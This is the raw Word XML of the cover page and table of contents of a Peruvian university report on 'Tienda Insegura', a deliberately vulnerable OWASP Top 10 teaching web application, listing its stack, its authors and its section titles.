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1CB09" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:before="400"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6F50"/>
          <w:sz w:val="30"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>UNIVERSIDAD NACIONAL AGRARIA DE LA SELVA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F7006D" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:after="700"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:sz w:val="24"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>SEGURIDAD INFORMÁTICA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D80C24" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="13243F"/>
          <w:sz w:val="52"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>INFORME TÉCNICO FINAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7056CA45" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="C54E3B"/>
          <w:sz w:val="38"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Aplicación web intencionalmente vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9AA962" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:after="560"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">"Tienda </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>Insegura</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">" - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>Versión</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1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009"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="58E3C0DA" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="20385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60F93A" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E238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Proyecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6009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462419" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>OWASP Top 10:2025 - laboratorio controlado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="63CDBC09" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="20385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6A4915" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E238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Stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6009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8274F5" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Spring Boot 3.2.5, Java 17, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>PostgreSQL 16, Docker Compose y Nginx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="5767012D" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="20385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B387CC" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E238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Alumno</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6009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46B7DA" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Leonardo Benjamín </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Travezaño</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> Rodríguez</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="106D97D8" w14:textId="62DF8BBC" w:rsidR="00742FE9" w:rsidRPr="00742FE9" w:rsidRDefault="00742FE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>amani Salas, Jesus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="123F8314" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="20385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A4EEAB" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Docente</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6009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64EF5C" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>____________________________________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="17017596" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="20385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9443E6" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E238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Versión del documento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6009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FD99C9" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Final mejorado - agosto de 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E08AC7F" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Repositorio de la Versión 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="1F4E79"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>https://github.com/LeoTrve2024/tienda-insegura-v1-owasp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCE5609" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:before="640"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:sz w:val="24"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Tingo María - Perú</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:sz w:val="24"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br/>
        <w:t>2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC75F34" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9C0FC0" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Índice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74152BFD" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Resumen ejecutivo</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4570D5" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>1. Introducción</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6206992F" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>2. Objetivos</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322F7904" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>3. Alcance, ética y restricciones de uso</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6242593B" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>4. Arquitectura de despliegue y tecnologías</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266610EA" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Arquitectura lógica</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A3AABD" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>4.2 Tecnologías utilizadas</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D9E450" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>4.3 Puertos y aislamiento</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131887C3" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>4.4 Modelo de datos</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1D0E3F" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>5. Guía de despliegue y ejecución</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B84887" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>5.1 Requisitos previos</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C31B04" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>5.2 Ejecución rápida</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F0363A" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Ejecución manual con Docker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Compose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555D3DBD" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>5.4 Verificación y solución d</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>e problemas</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75166070" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Descripción técnica del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767E8E4A" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Descripción técnica del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>frontend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> y la base de datos</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70259268" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>8. Datos y credenciales de laboratorio</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
    </w:p>
